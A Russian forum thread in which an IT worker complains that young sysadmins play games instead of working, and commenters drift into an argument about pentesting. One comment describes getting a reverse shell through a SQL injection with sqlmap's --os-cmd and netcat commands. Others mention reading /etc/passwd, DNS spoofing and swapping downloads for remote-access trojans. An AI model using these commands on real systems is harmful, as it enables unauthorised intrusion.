Отдел IT, обслуживаем несколько крупных организаций. Самая большая - 7 этажей, до хрена компьютеров и юзеров. 5 сисадминов, у всех профильное образование в виде ВУЗа, всем или по 30, или слегка за, у всех семьи, дети, кредиты за машины, ипотеки, в общем все хотят зарабатывать (получать) как можно лучше. Получают на сеодняшний день вполне прилично.
Я уже немолодой дяденька, они мне все почти в дети годятся.
Сегодня утром звонок от одного из админов (начальник в отпуске, я как старший по званию после него, на больничном с бронхитом, но в доступе): - Здравствуйте, ... у нас тут все корпоративные сайты перестали грузиться, ... или грузятся ... очень медленно .... Вы ничего там не делали? Тут уже начальство звонило ... (в трубке прослушивается звук игры "танчики", многоточия - это паузы, знаю, что у него стоит второй монитор, на котором круглый день играются "танчики", видимо игра отвлекает :))
Сервер свой, стоит в конторе, ничего особенного, Linux + Apache, + все что нужно, обычно работает бесперебойно, крутится сайтов около 20. Тут же пытаюсь соединиться удаленно - отказ в доступе на IP по FTP и SSH.
- Гляньте, пожалуйста, проблема кажется с вашей стороны, Вы там железо не трогали? Попробуйте сконнектиться. - Нет, мы ... ничего не трогали (слышен звук стрельбы из танка) ... щаз ... нет, я по внутренней сети тоже сервера не вижу ... - Попробуйте еще - Ну вот ... я Сашу попросил ... у него тоже сервер не виден ... (Саша сидит за соседним столом, тоже весь в танчиках).
(Спуститься на этаж вниз в серверную и посмотреть, что там на сервере напрямую, видимо, не судьба, что-то не позволяет ... или не отпускает).
Вижу, что ничего хорошего не предвидится. Заползаю на сервер своими методами - вижу, что все в целом на месте (кроме пары новых вирусов :)) . Поднимаю такого же, как я , немолодого дяденьку, который у нас админ, но работает удаленно и вообще как-то на то ли пол, то ли треть ставки. Он залезает удаленно на сервер своими методами, через 5 минут сообщает - сошел с ума антиспам на почтовике, валит тонны спама и запускает какие-то процессы, в результате забито все свободное место и перегруз процессора. За почтовик с антиспамом, кстати, отвечают именно наши админы.
Минут через 30 проблема решена, антиспам поставлен в стойло, все веб сайты грузятся, почта ходит. Проблема совсем не сложная, кстати, случается уже в третий раз.
Отзваниваю админам:
- Все в порядке, все арбайтен - А, хорошо ... (прослушиватеся звук "танчиков") - Вы отзвонитесь, если опять что-то будет - Да ... позвоним ... (прослушиватеся звук "танчиков")
Ну как то вызывает всякие не самые лучшие мысли. Работа сведена в втыканию проводов, если нужно, подключить кому-то принтер, вершина - это заменить жесткий диск в компутере какого-нибудь юзера и поставить Виндоуз- Офис. Все остальное - ну видимо, а ну его нах, "танчики", "танчики", "танчики" ... ну и во что-то там еще они играют, причем "командой".
Но на недостаточную зарплату и упоминание ипотек, кредитов и т.д намекают регулярно.
Что же будет дальше?
После слов "ничего особенного, Linux + Apache, + все" мне стало грустно за вашу контору)
Возражу. Из своей практики проведения пентеста: Сайт на PHP + PostgreSQL. тестил все точки входа - тишина. Не нашел даже XSS. И только в одном месте Time Based SQL injection, причем до такой степени противный time based - оооочень медленный. SQLmap с опцией --os-cmd выполнил тестовую команду id далее было всё намного проще: на своей машине nc -lvp 3333 на удаленной через sqlmap: nc -nv <мой_IP> 3333 и я имею реверс шелл с удаленного сервера. Далее можно было пробовать локальные эксплойты под ядро, чтобы до root-а подняться, но этого не требовалось. Кстати хозяин оплатил очень хорошо :)
А вот и не соглашусь, выполнять команды скульмап может только через xp_cmdshell (mssql), в nix - так.
Возражу. Из своей практики проведения пентеста: Сайт на PHP + PostgreSQL. тестил все точки входа - тишина. Не нашел даже XSS. И только в одном месте Time Based SQL injection, причем до такой степени противный time based - оооочень медленный. SQLmap с опцией --os-cmd выполнил тестовую команду id далее было всё намного проще: на своей машине nc -lvp 3333 на удаленной через sqlmap: nc -nv <мой_IP> 3333 и я имею реверс шелл с удаленного сервера. Далее можно было пробовать локальные эксплойты под ядро, чтобы до root-а подняться, но этого не требовалось. Кстати хозяин оплатил очень хорошо :)
А вот и не соглашусь, выполнять команды скульмап может только через xp_cmdshell (mssql), в nix - так.
а я про что?
Цитата
--os-cmd=OSCMD Execute an operating system command
Это сообщение отредактировал kazanec - 21 мар. 2017 г. в 23:48
--os-cmd=OSCMD Execute an operating system command
Прочтите каким методом выполняются системные команды скульмапом
Цитата (7H21 @ 21.03.2017 - 23:43)
что они будут делать при наличии X.509 сертификатов? Или собственных сертификатов вообще?
А ничего скорее всего, хотя, если очень заморочиться - можно подменить любой качаемый вами exe на RAT/HVNC и делать все, что угодно Это сообщение отредактировал bimb0 - 21 мар. 2017 г. в 23:51
Вы лучше пожелайте удачи парням посередине Что такое mitm вы можете прочитать в википедии, а как подменяются DNS и что из этого выходит вам лучше и не знать. З.Ы. Если есть возможность - я полюзую ключи, а если есть возможность использовать еще и двухфакторку - я обязательно ей воспользуюсь
Я старый олдфаг. :) Потому у меня все коннекты строго по IP (и срал я на DNS, да и IP все свои я помню на память) и SSH зажат строго в V2 (и на клиенте тоже не забываю ставить).
Понимаю, что это не панацея, но шансы на нормальную атаку тем же mitm - имхо, даже меньше, чем мне 6 из 45 выиграть, купив один билет за всю жизнь :). Потому как надо до икса для вклинивания в роутинг, да ещё и сеанс на открытии надо поймать. Сдаётся мне - такой мониторинг будет стоить очень до икса. Проще и дешевле купить эникея хостера :).
--os-cmd=OSCMD Execute an operating system command
Прочтите каким методом выполняются системные команды скульмапом
мне не нужно читать маны sqlmap-а - это один из моих основных инструментов Работает так, как я описал. P.S.: Само собой на стороне сервера не винда была.
если меня начинают затрахивать с мелкими просьбами и говорят что ты все равно на компьютере играешь - говорю идите "далеко" - не моя работа я свою сделал
начинают пресовать или угрожать - сваливаю в течение года при условии помогать на предыдущей работе за тройную оплату
вы не поверите - тихо мирно - никто не донимает - играю себе на компе - 500 серверов и херова туча молчаливых и согласных со всем пользователей
идилия - главное тех кто мешает на компе играть послать подальше и поглубже
мне не нужно читать маны sqlmap-а - это один из моих основных инструментов Работает так, как я описал. P.S.: Само собой на стороне сервера не винда была.
Ну вы все-таки прочитайте и сюда скиньте как скульмап выполняет команды...
мне не нужно читать маны sqlmap-а - это один из моих основных инструментов Работает так, как я описал. P.S.: Само собой на стороне сервера не винда была.
Ну вы все-таки прочитайте и сюда скиньте как скульмап выполняет команды...
Из вашего же примера:
Цитата
sqlmap -u "http://...?id=" --os-cmd=ls - выполнить команду, скрипт запросит пути куда лить оболочку, его тип и т.д.
Закончится все это как всегда - наступит кризис и всех этих "танкистов" выкинут нахер на мороз как лишнее звено и, чсх, даже не заметят разницы. А они в свою очередь придут на ЯП и будут ныть "как все в стране херово, даже вот таких великих специалистов (тут не будет уточняться в чем) сократили и оставили без хлеба и ипотеки. Страна катится в г-но, все ужасно, везде распилы и безблагодатность" - в общем будет очередная порция говноедских постов, чтобы оправдать собственную уебищность и не признать собственных ошибок.
Упс, смотрю тут уже перешли в прикладную айти фаллометрию, а я все первый пост комментирую. Пардон, не буду мешать. )
Это сообщение отредактировал NMNH - 22 мар. 2017 г. в 00:02
sqlmap -u "http://...?id=" --os-cmd=ls - выполнить команду, скрипт запросит пути куда лить оболочку, его тип и т.д.
Ну а я про что? Заливается файл с расширением пхп и минишеллом внутри, нельзя системные команды в никсах через sql-inj выполнять, можно только записать произвольные данные в файл (если file_priv=y, нет кавычек и дира позволяет в себя писать+ доступна из веба).
Это сообщение отредактировал bimb0 - 21 мар. 2017 г. в 23:57
Вполне себе можно добиться выполнения произвольных команд от юзера приложения, можно по бд пошариться. Есть разные варианты.
Нука пример? Никаких "произвольных команд", при sql-inj вы можете использовать только sql (и то сильно ограниченно) какой там exec, да тем более через тот же sеlесt
как тебе вариант выполнения запроса, который отдает в ответе строку кода, который выполняется внутри приложения если нет четких критериев обработки ответа? и не надо мне говорить, что это не работает, это прекрасно работает. тот же селект, который вернет в ответе, для примера exec(/bin/cat /etc/passwd); который будет обработан php...
как тебе вариант выполнения запроса, который отдает в ответе строку кода, который выполняется внутри приложения если нет четких критериев обработки ответа? и не надо мне говорить, что это не работает, это прекрасно работает. тот же селект, который вернет в ответе, для примера exec(/bin/cat /etc/passwd); который будет обработан php...
Фантазер Чтобы любой код из базы вполнился необходимо засунуть его в хотя бы в эвал, любо в коллбэк-функции. и будет это уже не sql-inj, а php-inj/code exec из-за недостаточной фильтрации данных
Лол. Если только такая мелкая хрень случилась, а всё остальное работает - это хороший показатель работы. В жопу компы. Как мы с програмером внедряли УПП + кучу новых серваков на разрозненных территориально предприятиях - это жопа. При этом куча других проблем вялотекущих. Короче, врагу не пожелаешь. А раньше был только ADSL. По удалёнке плохо было.
Это просто праздник какой-то. А зачем у вас там nginx если все на апаче? cry.gif
З.Ы. Ты точно админ а не тупо выдумал котоламповую историю порубать чуток юкки на теме "молодежь нынче ну тупаааая!" gigi.gif
Ты погоди, щас окажется, что нжинкс просто стоит на гейтвее вместе с задроченным варнишем для кэширования, за ним фронт-энды на апачах, редисы-хуедисы, мэмкэши, и вместо БД галерный кластер. И все это стараниями нашего покорного слуги ТСа.
sqlmap -u "http://...?id=" --os-cmd=ls - выполнить команду, скрипт запросит пути куда лить оболочку, его тип и т.д.
Ну а я про что? Заливается файл с расширением пхп и минишеллом внутри, нельзя системные команды в никсах через sql-inj выполнять, можно только записать произвольные данные в файл (если file_priv=y, нет кавычек и дира доступна из веба).
Пиздец. Теоретик спорит с практиком ))))))) Генерится пейлоад, далее он заливается (перед этим всем, если не включена опция batch будут вопросы по языку программирования на аткуемой стороне, платформе 32/64) -> _исполняется_заданная_команда_которая находится_в_пейлоаде_
Пиздец. Теоретик спорит с практиком ))))))) Генерится пейлоад, далее он заливается (перед этим всем, если не включена опция batch будут вопросы по языку программирования на аткуемой стороне, платформе 32/64) -> _исполняется_заданная_команда_которая находится_в_пейлоаде_
Не надо глупости нести.
Слушай, практик, давай уже пример, скульмап запустить много мозга не надо, ты лучше расскажи как генерится пейлод, как полезная нагрузка попадает на атакуемую машину и как, а главное кем, интепретируется
Цитата (7H21 @ 21.03.2017 - 23:58)
ну мне сложно представить конкретно в моём случае такую ситуацию. Разве-что как-то очень сложным путем репозиторий дебиана например подменить...
Да и активность на левых портах отслеживается постоянно. Ну и процессы можно подписывать, если паранойя :))
А у вас репы айпишниками прописаны или доменами? Если второе, то подмена DNS все решит Это сообщение отредактировал bimb0 - 22 мар. 2017 г. в 00:06
Только зарегистрированные и авторизованные пользователи могут оставлять комментарии. Авторизуйтесь, пожалуйста, или зарегистрируйтесь, если не зарегистрированы.
1 Пользователей читают эту тему (1 Гостей и 0 Скрытых Пользователей)
yaplakal.com
snegopek21 мар. 2017 г. в 23:41